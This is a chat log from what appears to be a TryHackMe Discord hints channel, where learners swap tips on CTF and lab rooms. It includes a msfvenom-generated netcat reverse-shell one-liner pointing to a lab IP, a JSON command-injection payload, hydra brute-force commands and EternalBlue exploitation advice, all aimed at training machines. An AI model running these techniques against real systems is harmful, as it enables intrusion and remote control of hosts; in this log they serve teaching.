#room-hints
@sleek harness you need to capture the login with intercept
Send me screenshot when you do this im on phone so i can't help you so much
I completed it with burp didn't try other method
i m solving the owasp top 10 room and i m wondering do I need to get a reverse shell in task 6 or exploit it using command injection only
today's challenge is interesting
anyone done with today's OWASP challenge?
yeah i'm done with it
I found the exploit and tried to paste it in the textbox in Contact page but the only input I saw when going through the code was target url
not sure if that is the intended way to complete the challenge lol
I'm missing something? Input or the place where I'm inserting it?
@autumn rivet look at Task 29 again, same method, different exploit
Not sure what's the issue you have faced. Based on the exploit, it seems to be quite straightforward
look at Task 29 again, same method, different exploit
@velvet talon thanks
can anyone give me hints how to escalate privileges in task 6 command injection practical?
@true widget you dont have to for the flags
we can read the contents of ||/etc/passwd|| so shall i brute force ssh?
coz i dont have the permissions to read the contents of root directory
are you aiming for the last flag?
cuz i dont think you have to do anything with the root dir
nope looking for the strange file in websites root directory?
so i didn't have to get a reverse shell?
not really, but it doesn't hurt
its enough to use the input box of the website
okk i ll try
i couldnt read it from the website when i tried earlier or i might be doing something wrong
What room is it?
owasptop10
i think you still aim for the /root dir..
the root dir and the website root dir is different, it refers to the webservers root directory
from where the evilshell.php runs basically
hello guys doing linux ctf room stuck in task2 #4 it says check in crontab i check but it didnt show the flag
plss help
Linux challenges room?
yes
There are multiple places for cron jobs to be shown. Try to enumerate and find some more
can some one explain to me how || login.js works in overpass room ||please
You don't do authentication clientside so you really don't have to know how the login script works
ow thanks ❤️
get rid of that last word of your reply before he sees
@oblique cliff mine ?
I saw
caught
imagine giving ur heart while 3 days to overpass room and still where I start
Need a hint with ||.xaa|| file in CC : Pentest
i tried dirb and gobuster but doesnt give me anything
any other wordlist i can use ?
Don't just scan in the directory you found. Scan on /.
The extension argument for gobuster, you use -x php not -x .php
youre also looking for the extension xaa when you should be looking for the extension xxa
@oblique cliff I did use -x xxa... just a typo i made here
yea then if youre running it on the correct directory it should find what youre looking for
Correct dir and correct VM
what wordlist do i use ?
i tried dirb and gobuster
dirb i tried the dirb wordlist
if you show us the command youre using we could help you more @warm sierra
screenshots
Can anybody help me with creating a reverse netcat payload
please
this is my syntax:
msfvenom -p cmd/unix/reverse_netcat lhost=10.11.12.141 lport=4444 R
and what happens when you do that? @keen rampart
This is my output:
mkfifo /tmp/zueh; nc 10.11.12.141 4444 0</tmp/zueh | /bin/sh >/tmp/zueh 2>&1; rm /tmp/zueh
but when I run it, my netcat listener doesnt pick anything up
this is specifically the network services room, and exploiting telnet
whats weird as well, when i run a ping using:
ping ip -c 10, my tcp dump picks nothing up
almost as if theres a firewall in the way
you tried pentest monkey?
@oblique cliff gobuster -e -u <box-ip> -w /usr/share/wordlists/dirb/common.txt -x xxa
pentest monkey?
search pentest monkey reverse shell cheatsheet
just found it
thank you
will try that
same effect
I think it could be a firewall or vpn issue
Is your VPN running directly on Kali?
yes
Should be fine then
hmm
Make sure you prefix stuff with the prefix tho
Otherwise it won't run the commands
what do you mean?
ok
You can only search for file extensions in dir mode, make sure to include dir @warm sierra
gobuster dir -u <box-ip> -w /usr/share/wordlists/dirb/common.txt -x xxa
hey lads
can someone give me a hint to how I can find shiba3's password
The room is learn Linux btw
So, it actually tells you what you need to do
There's a condition
You need to make that condition true
Then run the binary
None of those
because those are files
And you need to look in your home directory
ah
@final mortar thanks got it
hi, someone knows the answer to lord of the root room task 2 #6? "What's the method to exploit the system for privilege escalation called?" I complete everything except that, thanks!
We do not give out answers.
just a hint
I did, and I didn't find anything good for the overlayfs exploit... maybe they aim to another exploit?
There are multiple ways to root that box(unintended)
there are some weird files on the box itself that was the intended privesc path, look into what kinda exploit you couldve used to take advantage of those
need a hint for OWASP Day 8 Who developed the Tomcat application Googled around, but I can't find something that fits the answer
Yeah, that was a tricky one.. Don't go for one specific person
Bruh can anyone help me with Sqli in CCPentest ? .... i finished the whole thing except the sqli part
@velvet talon hmmm, ok. so I'm not looking for a person. well the question is a little misleading then ... will try harder then
Anyone ??
@warm sierra do you have a more specific question than that?
@marble dagger it is indeed, i would check the details of its release
@oblique cliff I found another way to exploit, i manage to exploit with it but again I cant find the right answer :\
right, i know. You need to go explore the box a bit more and check what the intended privesc path was
in order to answer that question
alright, thank you!
Quick question, is there a way to use msfconsole as just a listener? (its needed) (not shell and listner) I generated a payload via msfvenom but need to catch in msfc
yeah there all run the reverse_tcp bit too (i don't need that aswell) why i'm asking, thank you for the respose
That sort of question, not relating directly to a specific room, goes in #general @odd panther
Very good point thank you. will do so
@velvet talon must be blind. Can't find it. but the main problem is probably that I don't really know what I'm looking for
@marble dagger The first letter is|| 't'||
@marble dagger check out the license of the software
Or a better one, usually the founder claims the copyright of its software
@dense pike @velvet talon I feel like I'm in a deep rabbit hole now. last thing I got was something including a country's name. It almost looked right. but it wasn't
it's also not the original developer. You're looking for the current developer
Just search for the ||wikipedia page|| @marble dagger
Prefix it with a word starting with ||t||
For the overpass room, can you guys give a hint to what owasp vuln I'm looking for?
hey guys,im on the basic pentest room and stuck a bit with #6 What is the password?
hydra -l J** -P /usr/share/wordlists/rockyou.txt -w 20 -f -t 15 -vV 10.10.116.204 -s 8080 http-get /manager/html
but the 'easy' password dont drop...
when i spoil too much, then lets write directly
Are you supposed to brute force on that room?
I don't remember bruting on it
its the easter egg
Easter egg??
... hint
Well your command seems very wrong
Hold up
You're brute forcing the wrong place
In your command you're brute forcing /manager/html which is entirely wrong
You need to brute force ||ssh||
ah , okay then i give gobuster another shot
No.
You're not reading.
You have the username, you just need to brute force the correct place.
||ssh|| is not a directory.
okay, didnt read the spoil. thx for helping!
Also lowercase
Any hints for the root part too? (of overpass)
Check the room tags
Run some enum scripts
Think about what you can and can't control
@toxic scarab Needed that thanks!
Doing OWASP Top 10 Task 21 Day 7 Cross-Site Scripting #2 says go to 10.10.227.70/reflected and craft a reflected XSS payload that will cause a popup saying hello, but this is what I get when I go to the website in my kali machine. Is this the expected behavior?
Thank you
for blog should I be ||brute forcing the wp login or will i be waiting a long time cuz the password isnt in rockyou?||
Have you tried it?
There's 2 users. Maybe you can get into at least one of them in under 5 mins
alright cool, im starting the scan now i just wanna make sure i wasnt gonna waste 20 minutes waiting for something to finish that never will
I feel as though I've been lied to. (waited 10 minutes on the other user and nothing as well) ||Should I not be using rockyou?||
never mind it worked, it just took 8:05 cuz my computer is a slow boi
I don't think it has anything to do with your computer. It took me around 6 minutes too
What wordlist did you use?
still looking for OWASP day 8 #1 who developed the tomcat application already got hints yesterday, but I'm still too stupid to find a answer that fits. already looked on numerous pages including ||wikipedia||
getting OWASP Day 9 took me less than 10 minutes. but I'm still stuck with Day 8 Task #1. this is getting frustrating
search the question in google and it will pop up
@heavy anvil already did that, for developer of vim that is. nothing that fits. I'm obviously bad at this
well its not a single person its a team
and the number of asterisks for the answer of the question is not correct as long as I can remember
right just search the question exactly as it is on the google
thanks guys. i'm so stupid. got it now
Hey can i share the writeups i write here? I am new here
@narrow herald instead submit those in the rooms and let the room creator decide?
@narrow herald or you can submit them in #thm-community-media
After it's been approved by the room creator ^
Hey guys, last question of Day 4 for Advent of Cyber.
I'm guessing I need to look in the /etc/shadow file but says access denied as the mcsysadmin user.
Anyone got a little clue they can give?
What Room? (Link, Room title, room code from URL)
What Task? (Give the number!)
What question? (Number, maybe also basic details)
What have you tried?
What happened?
What didn't happen?
What did you expect to happen?
A picture paints a thousand words. Don't type a thousand words. Screenshots are awesome. Photos of your screen are not.
(If you want to paint a picture, we'll be impressed but a screenshot is really better)
@pseudo hamlet
Room:-Linux Challenge task4 #7
@steady stratus can you pin that in this channel too so I don't have to copy paste whenever I use it here?
Yea in room help. But I have to copy paste it over and it's annoying on my phone
@oblique cliff need more info from mine?
As it's #room-hints @oblique cliff i'd be inclined to say no (to copy and pasting the formatting expected in #room-help) (although I absolutely see your reasoning)
People who come here should have a different formatting to their question like:
- What room
- At what stage are they stuck exactly?
- What have they tried so that we can give a hint for something they haven't already tried
Anything further then that should go in #room-help imho
@slate swift I haven't done that room, but to look at the shadow file you need to be root. So you need to get root access in order to do that task it seems (unless the shadow file has weak permissions on that machine)
ofc you guys are the ones on the ground so, I take your word greatly (:
@steady stratus thats fair, can you pin that then?
No I just want something that's easily referenced from my phone haha. Cuz I usually go to room help, find the pin, copy, come back here and paste
That'd be appreciated
#room-hints is here for people who want a "pointer" towards the room they are completing, and not necessarily a spoiler. As such, when asking a question, be sure to include:
- What room you are on
- At what stage are you stuck exactly? Enumerating? Exploiting? Priv esc?
- What techniques / tools have you tried so far? Just so that we know how to hint you in the right direction without repeating what you've already done
Can someone give me a hint on the last challenge of task 5 of room Agent sudo? Its a bonus challenge. ||Who is agent R?||
It's a basic room, this task covers using la, cat, grep. I don't think it's meant to require privesc.
Hmmmm, anyone else done the Advent of Cyber room and can provide a hint?
Day 4 - Q7
@white salmon See if you can delve a little deeper into the whole theme of the box.
You might be able to find a file somewhere that might mention his real name
@slate swift have you checked the permissions of the shadow file then?
Hm..ok i would do that Thankyou, if i cant find it can i come back and ask again?
Yeah, sure
@slate swift You can google how to do THAT thing, there will be commands on the internet and just try and you will be able to get it right, its very easy
Also actually, @white salmon, if you've already solved #2 of Task 5, then it should also be there I think
@oblique cliff permission is ---------- 1 root root
@smoke google seemed to suggest that the password is hashed only at creation and stored in the shadow file. Are you saying since I know the password I can figure out the hash?
yea, im pretty sure you stumble upon the name along the way if youre doing that room @white salmon @white salmon
@slate swift if you know the hash you can crack it using hashcat
its asking for the hash itself, not the password
Oh yes i am sorry
im looking at the room to get a bit more info @slate swift give me a sec
Tah
@slate swift did you read the documentation they gave?
The answer is there, its very straight forward
your answer is right here
make sense of it and apply it and you will get the hashed password
Hmmm, okay, let me poke around
mhm
yea, smoke gave adequate hints, you should be able to solve it now
OMG, wow. 🤯 I was really over thinking.
I was like surely it doesn't mean look for what I think it means everywhere.
Yes it does. Wow. Hahaha.
I'm following along with the official writeup for year of the fox and am stuck on the RCE step. The guide shows using the following command to get the remote host to ping my machine ||{"target":""; ping 10.9.58.: echo""}||. However when running that I don't see any echo packets via wireshark. Am I doing something wrong with the command? (ip redacted) edit: I changed the command to ||{"target":""; ping 10.9.58.; echo""}||, I don't get a response in burp and still no echo responses either.
hey lads
how exactly am I meant to find shiba4?
All I can find is a directory named shiba4
which isn't a .bin file
the room is learn Linux btw
@wind fog Are you searching for a directory or a file? What command are you using?
find shiba4
and I think I'm meant to find a bin file
though there is none that I can find
i can't run shiba4 though
You assumed it had an extension
@wind fog What's in the directory?
Use find to look for things of type file
theres a lovely room called TheFindCommand which will help with that if you need some assistance π
find / -name shiba4 | grep shiba4 | grep shiba4
you can use the find command to search for something of name shiba4 of type file
Try this
right now youre in a directory called shiba4, thats different than a file @wind fog
yea what
And it still doesn't filter error messages
Which is the only filter you need @crystal glade
and ran find shiba4
That's not how find works
wdym?
I mean that you misused find
https://tryhackme.com/room/thefindcommand @wind fog I'd, again, recommend completing this
great room!
And looked for all files in currentDir/shiba4/ @wind fog
That's what that command did.
@oblique cliff this one
You have to learn how to use find
@stuck fractal I used like this but it's looking wrong so probably i need to complete find room
astute observation
You shouldn't be piping find into grep like that
better to be using it correctly than to be hacking together something that sometimes works when find is built to work better
So on YOTF, I'm trying to get the remote host to ping my system. The command is: ||{"target":"";ping 10.9.58.***;""}|| which is in multiple writeups. That's my tun0 ip and I do have access to the search page. I'm really not sure what I'm doing wrong at this point. I'm still not capturing any ping traffic in wireshark.
Wireshark capturing on tun0?
Thanks!
Otherwise you just get encrypted traffic
I need help with the bonus challenge in room Agent Sudo, its task 5 question 3. I tried but cant get anything
@white salmon enumerate more
its on the machine
look at all the files, read the files
OMG
i got it
i am so blind
wow
Thanks alot for your time, i appreciate it @oblique cliff
yay, congrats
hello guys im copying a file from victim to my THM machine using SCP but it says permission denied
Screenshot
Ok, you wanna break that command down for me? I wonder if you can spot your mistake
scp [options] source destination
simple word plss
So
Your current command
is copying a file from alice@10.10.114.139:/home/alice/flag32.mp3. Where's it copying it to?
im copying to /root direc in my sys
yes
You're copying the file from the machine to itself RN
ok
You haven't told it to copy to your machine
i also have to add my machine ip add
There's a better solution
You can just run that SCP command on your attacking machine
Because you specified exactly where to get the file from
hello guys Stuck in Linux Challenge room Task 5 #4 dont know to recover flag from .mp3
do google search but didnt find anything
Have you listened to it?
I'm sure there should be, I've never used it.
yes ^ the in-browser doesn't convey sound so well unfortunately
if you can find a way to download it to your host as boblo said
you'll get the answer you need
I prefer "blabla"
I pronounce your name as "bob-lob-law"
i am a master of tongue twisters
i'm gonna hack into your blog and delete my traces, so that way you can't find me via your bob lob law blog logs
I tried saying that lol
Anyone have any hint to offer on the submission of the user flag for the jeff room please?
@maiden flower MD5
but the bob loblaw law blog logs are super secure (i couldnt think of a good tongue twister to keep in going, sorry)
the full string and just the bit in the braces
@maiden flower braces
pretty sure I tried this but will go again
yes I had tried this its having none of it
can I PM @wraith tapir just for my sanity here
Yeah no prob
can someone please help me with this?
I've done every thing else in the room and am stuck on this
I have no clue how to find the answer
Did you find the binary?
You'll have to use the find command to locate the shiba4 file
Then you're using it wrong still
you didnt do the room thefindcommand did you?
i did
cuz youd know how to find it if you had
most of it anyways
do all of it
Remember, it's a binary, so it's a file
How do you use the find command to only look for files?
And no one said it's in /home
is it in root then?
Well, we don't know
find -type f
that's why you gotta search the entire system ;)
@white salmon Technically speaking everything is a file on Linux.
@tidal sedge All directories are files but not all files are directories
please someone just give me a hint
@wind fog Use find. On the whole system. Looking for files. With the right name.
and what exactly youre searching for
thank you barack
Everything is a file describes one of the defining features of Unix, and its derivatives - that a wide range of input/output resources such as documents, directories, hard-drives, modems, keyboards, printers and even some inter-process and network communications are simple strea...
If that's true, then why does find -type f never show directories? 
like this?
No
damn
You know how to look for files with a certain name
keep trying
-name?
how closely did you pay attention to the room the find command?
Read manuals
?
try it and find out
1 you can filter out the permission denied
2 they dont all say permission denied
hmm
Try adding -xdev 2>/dev/null
-readable?
I really recommend not bruteforcing #room-hints for answers
And reading the manuals and doing the research on how to do things
@white salmon thanks man
@stuck fractal I know, this was my last resort, I've been on this single question for hours now
and am quite desperate for an answer
Yeah, except once you've been given the hints you should keep trying yourself
hey guys help plz lmao
im stuck on the linux room
and it asks to create and run the noot.txt file
It doesn't say run the noot.txt file
you have one executable file
The ableist slur.
sorry
If it's FTP, switch to an EU VPN server
okk
it's a platform issue that's being investigated
damn youre smart, he didnt even ask the question yet
A lot of people have the same issues usually
You can compliment me all you want, still not going to let you use the slur
not what im trying to achieve lol
I get it wont curse here
also i got mine working ty
Reading the question is incredibly important
Sitting back, and applying some logic is too. Why would you be able to run an empty file that you just created and somehow get a password?
idk lol
Exactly
i just want sure what binary - this is my first room
It lists it
true
If you read the room, including task titles
Reading is a key skill
Without reading the question and the info you're given, it's going to go badly for you
looks like EU vpn works awsome thank you
@white salmon hey sexy :0
hey
wanna be friends?
ugh
No
Because ubuntu doesn't normally have a root password
@white salmon We do not give out answers, so that's false.
oh k
linux
learn linux
first room
wdym no password, u should've been root already
Nope.
just a sec
nope, so, any idea how to access the file then?
That's what you'll have to figure out :)
Maybe the password isn't the key
but... but... they never told me
There's other ways besides passwords to get to root
Hold on, i had to get to that room
Unfortunately, you're going to have to figure a lot of things out for yourself
That's part of the fun of penetration testing, though.
Did u get to the point where u switch to nootnoot user?
Try getting this script onto the machine, and running it
what's that?
It's a Linux Enumeration script
It'll basically scan the entire machine for you, and tell you some obvious attack vectors and vulnerable things.
yeah
You need to use the knowledge from previous tasks
Not all of the users
Usually the first thing I do when I gain access to a user and password, I always check sudo -l btw
It's a quick and easy way to find privilege escalation ;)
@wind fog ah now i remember
none of them can run root
ah, what worked?
@wind fog wat
Not sure if you really checked all users.
Remember, not all the users are just shiba
The hint im gonna give u is to use find command
oh true
And look through files owned by shiba users

Maybe you can find creds for one of those

u need nootnoot
how do u find the password for them?
By looking
look for suspicious files
or at least, out of place files
actually now when i remember how much i tryharded for this
i gotta forget it somehow
any hints for blog privesc? the ||SUID for checker can't really be taken advantage of that I can see||, then I found ||the password for bjoel, but thats for the wordpress site, not his actual account|| and I can't find anything else that's interesting to me
what file
@oblique cliff Do some RE on the binary
@stuck fractal oof thats what i thought it was gonna be, thanks
@oblique cliff remember everything I taught you1!!!
Blog was what made me actually get into RE
@oblique cliff Ultra basic RE, like chuck a decompiler at it
find / -user <username> -type f
with the hackpark thing, is there a specific way to reverse image search on firefox? cos saving the image and then using google image search isnt giving me the answer
oh damn yall are making me nervous if i dont figure it out now
use this
@oblique cliff no pressure
It sends the output of everything you don't want to see into /dev/null
which is a fancy word for the trash
(actually more like a void i guess)
damn, I'm glad I finally have a fancy name to be called
The real purpose of /dev/null is that it's a file that you can send input into, but the output literally just doesn't exist.

So it basically eats any input you send into it, and nothing comes out.
ah, interesting
how does that command work though?
@wind fog It's not really a command
You're redirecting the output like you've done before
cat it
@wind fog any progress?
Let me explain u
by using the find command
u are looking for files out of place
owned by each user
the find command didn't give me anything though
for example
mostly users make files in their home directories
look for files that arent made in that dir
hint:
||shiba2 user||
No
not that user
ah
yes
oof, lemme take another look

output is like
as far as i remember
only 15ish files so it really shouldnt be hard
u use that dir before in a task i think so no
here are some of them
One of those looks suspicious to me
You can ignore everything in /proc/ tbh
Yea totally smth suspicious there
.profile?
@stuck fractal got it, thanks :D
embarrassingly the thing i ended up asking for help on was transferring the file to my kali machine cuz i thought you needed write permissions to do that, but you only need read permissions
@white salmon thanks, as always
oh i just did a regular python server and wgetted it
SCP best
You can also just navigate to the ip-address:port with your web browser once you've opened up a HTTP server
and navigate the entire machine like a directory
(and download files directly from web browser)
just by clicking
You could host a ruby HTTP server 
this maybe?
cat it
perm denied
ls -la?
tough time
and u are? shiba4



name 3 others
@oblique cliff Netcat, http servers, upload via FTP, upload via SMB, base64 encode and copy text
hey i said 3
And I disregarded that guidance
scribbles down in notes
i forgot you could transfer files with nc
id say i forgot but i never knew
alright, I'm lost, I'm now in nootnoot but am still unable to access root and haven't got a clue where to go from here
sudo?
Try things.
damn, i'll try
remember me when you become a millionaire
@wind fog well good luck with that task .. it took me 3-4 days to barely solve it.
i only finished it yesterday.
yeah, i would have been on it for weeks if I didn't have help
i got the concepts, just not how they related to one another
yay people my level
it's pretty hard this one i'll tell you. you reaaally need to focus and don't give up.
i felt so frustrated at this task, but did some research, and did other rooms (i grew more knowledge on other things too), and still didn't get it without the hints that were provided here.
but trust me .. this task will teach you how to navigate through linux comfortably.
Room: Powershell Scripting - Task 3, Question 3 "How many cmdlets are installed on the system(only cmdlets, not functions and aliases)?"
Why is this not ||7935||?
You're not filtering correctly
Is this room broken on task 8? https://tryhackme.com/room/xss
Or is it looking for something very precise?
yes and yes
hey peeps
how would I use the search command if I wanted to search for a file which contained what i was looking for
for example I'd like to find any file containing flag in its name
That sounds like a question for google first
And a recommendation to redo the find room
!rule 13
Rule 13: When asking for help/tech support please perform research to your fullest ability. Mods and Community Mentors have the right to refuse helping those who have not done troubleshooting/research on their own first. Clearly phrase your questions as we (fortunately for all parties involved) cannot read your mind. Please include the room, task, and question number in your question if possible.
alright
could you tell me if my current try is wrong or if there is nothing containing flag at least?
Why not create a file and try for yourself?
alright, im going to assume that i did it wrong
Inspect the flag21.php file. Find the flag.
do i need to download anything ? most of them say that i would need to use the command ||PHP|| which requires me to download a ||PHP|| program.
I'm not sure what site/"old friend" this is referring to in the Burp Suite Room Task 11 #1. Could I get a little nudge in the right direction. (I also don't believe it is in the deployable machine's website, but I could be wrong).
Its referring to the juice shop still. There is no second site
Just explore the website and you should come across it unknowingly
And old friend is referring to a system with Burp. Make sure you read the previous parts as to what the old friend could be
I am very new to cyber security (passed my Sec+ this month) I am really stuck on this question in the "intro to research" room. I have completed every question except this one. If someone could point me in the right direction I would be very thankful.
The question is "If a password hash starts with $6$, what is the format it is (Unix Variant)"
I know the hash is || SHA-512 || but im not sure what it means by "What format is it"
The hint that follow with this question is || cry ||
I'm so lost D: second day scurrying the internet for this answer.
It's not quite sha512
Sha512 doesn't have a prefix, is typically hex output, and doesn't have a salt when it's purely sha512
it's related to sha512
So would it fall under crypt(C)?
That's the library that is normally used to implement it
The way I got where i am is by searching a hashcracker and looking at examples, from that I concluded that it was most likely SHA-512. From there, I looked up SHA-512 and "Unix Format" which led me to the wiki for Crypt(C). Not sure if im going in the wrong direction
It's not quite sha512, as I said
Crypt provides unix hashing functions like md5crypt which are used in /etc/shadow or /etc/passwd
Ok that's actually a fairly big hint
thanks man! I think I got it.
help with owasp top 10 day 3 task 12 voucher? i found the hint pointing back to the main page but i cant figure anything out
My dudes, I'm doing the Hydra-ha-ha-haa challenge from the Christmas room. Any hints on how to find the username?
@final sluice you'd have had to email the email on the home page
@cosmic phoenix you're told the username
Is that a hint?
ah, I kept thinking about doing that but i kept thinking that was too simple derp
Oh that's it ? Alright great. Thanks James
Hi can I have a hint for the privesc on GateKeeper ?
I ran winpeas and windows-exploit-suggester but I'm still stuck.
1 hint is read the room description
2 hint is look for stuff that isn't installed by default on the machine
so with the .lnk file, I'm on the right track ?
What lnk file
Fifrefox.lnk on the Desktop's user
Explore it and find out 🤷🏿‍♂️
aight thanks
~~google is your friend here ~~
in room "Burp Suite" task 6, section 7: Defined in RFC 6455 as a low-latency communication protocol that doesn't require HTTP encapsulation, what is the name of the second section of our saved history in Burp Suite? These are commonly used in collaborate application which require real-time updates (Google Docs is an excellent example here).
can find this info, not even on the hint site
omg, sorry... im just blind
hey guys
can someone give me a hint as to which two files this is referring to?
the room is linuxctf task 2
@wind fog what have you looked for
It's not meant to be a trick it's very straightforward which two files
I'm not really sure what to look for
i've searched for files which might stand out but found none
What files are in your home directory
cd ~ brings you to your home directory, or just cd
No problem
@final mortar imo if you just tell people that command they don't learn what that means and understand that ~ brings them to the users home directory
That's why I try to ask leading questions a bit more. Again, just my opinion but I feel like that helps people a bit more
Yeah I mean I read what you were helping with just supplemented the info
wait I can improve it
Better
btw you know I do that don't you
I know, you're awesome with help! I just saw you give the command right there
No worries
am i missing something with the exploit(windows/smb/ms17_010_eternalblue) in msfconsole? it is stuck on [*] 10.10.46.84:445 - Sending all but last fragment of exploit packet. its for the eternalblue room
Try different payload
try with windows/x64/meterpreter/reverse_tcp
i didn't select a payload. guess i missed that. set payload windows/x64/meterpreter/reverse_tcp
still not finishing the connection it seems
can you give it some time to finish
ya i have been waiting about 5-10 mins during each try. so wait longer?
same thing. wonder if i made it unstable
Like seconds
Update your metasploit
And then if that doesn't help reboot the box
@sonic fox you changed the payload and waited 10 mins, I just suggested it 1 min ago
And if that doesn't help show us again
no it still running
It's supposed to take longer at that stage
try restarting Metasploit as bob said, ensure the payload is correct, verify your connection cause I just checked, your instance works fine https://i.imgur.com/vAWPeY7.png
@sonic fox
Hi hope you're well.
I'm going through the ten days of OWASP and I'm on the [Day 5] Broken Access Control (IDOR Challenge)
I visited the site and I believe that the goal is to change the last number at the end of the url to access another person's notes
The url being http://10.10.89.241/note.php?note=1
I changed the 1 to a 2...
I've run through a range of about 3500
am I doing something wrong?
nvm, just realized that I should've started at 0
Ahh got you, thanks
hey lads
is release some kind of command or what?
if it is could someone maybe give me a site explaining how to use it, cause I can't find one
It's referring to a file.
You really need to give people context when you ask questions about rooms like this.
thanks @final mortar and @oblique cliff. had to update metasploit and restart.
i got shell.... now what?! j/k
welp, I have found the release file, which is just a text file full of code with no flag of any kind
any idea how I could get closer to the answer?
the room is linuxctf btw, task 2
kernel version is what "uname -a"?
a is for all
just gives me this and no flag
You haven't found the correct release file if it's not in there
It tells you the exact name
The * isn't a regex thing it's in the name of the file
really?
how do I use find and add * to the name then without 500 results showing up?
if u could tell me it would be a huge help
You could use a regex with a literal *
smh all tutorials saying to abide the law
Regex101 allows you to create, debug, test and have your expressions explained for PHP, PCRE, Python, Golang and JavaScript. The website also features a community where you can share useful expressions.

thanks man
Use that link to try stuff out and find out how to do a regex with special characters
Safe for work. @wind fog
@white salmon If you don't like it, this isn't the place for you. Rule 9 applies.
Hey guys, let's not make jokes like that
Not even remotely ok
Also, this is a hints channel...
Thank you
No worries
If you would, please remove that joke regarding minorities
Thank you!
what a silly guy
:D
🥶
For joking around, please move to general ❤️
is the first part of jigsaw even doable over VPN? Cos I am buggered if I can capture what I am supposed to?
If it's FTP related, use an EU VPN server
no its about it leaking a udp packet with some info in, I got so frustrated trying to get something out of the machine I ended up looking at a write up for the first piece... but I cannot replicate either of the potential routes the arp routes I am not surprised by but .... nmap and a wireshark capture just doesnt do what they say it does but all three are vulnhub write ups
i.e. no vpn at all
hey peeps, I've found a file which I'm pretty sure I was meant to find, but am not sure what to do with it now, I've tried executing it, catting it, and I haven't got a clue what I'm meant to do with it.
the room is linuxctf btw, question 3, task 5.
#room-hints is here for people who want a "pointer" towards the room they are completing, and not necessarily a spoiler. As such, when asking a question, be sure to include:
- What room you are on
- At what stage are you stuck exactly? Enumerating? Exploiting? Priv esc?
- What techniques / tools have you tried so far? Just so that we know how to hint you in the right direction without repeating what you've already done
dang it
lol
Linux CTF, priv esc ^
this seems new ^^^
Have you tried running it
Yes...
yep, told me permission denied
but I haven't got access to the sudo
anything else I could try doing with the file, cause right now I'm lost
I guess you could try reversing it but check the room tags see if that helps.
I don't want to lead you in a wrong direction so I'll wait for someone else to come help.
reversing it? I'm quite new, so im not really sure what that means
I have not completed the room so me saying anything is virtually useless.
ah
that's a beginner room, there'll be no RE in it
Exactly why I said whatever I say is virtually useless ^
linux challenges? @wind fog
Oh it's linux challenges
weren't you asking about that earlier?
Linux CTF is the machine name not the room name.
oh
the hint tells you the name of the file
youre going down an unintended rabbit hole
yeah, *request
its not a track question, you should ||find the file called *release||
no
look at the hint again
you misread it
i ran a find command for *release but didn't find one
then your find command wasn't good enough
you need to look at how to find something with a special character in the name, cuz the * is messing it up
not sure, make a file called *requestt and see if that finds it
yep, it found it
I've been on this for over an hour now so at this point I'm quite desperate for answers
true true, now it's giving me 300 results for release
so im assuming my find command is wrong somehow
You're probably not escaping the character correctly at my guess
find / -name *release 2>>/dev/null
is this wrong??! please tell me, I am sick and tired of this question by now
In the command you just sent
you're not escaping it
you just showed a good command earlier about how to escape a special character
why did you get rid of the escaping
find / -name *release 2>/dev/null
find / -name \*release 2>>/dev/null
Try this
Single quotes are magic
James -_-
Backticks are magic in discord
so '*'release
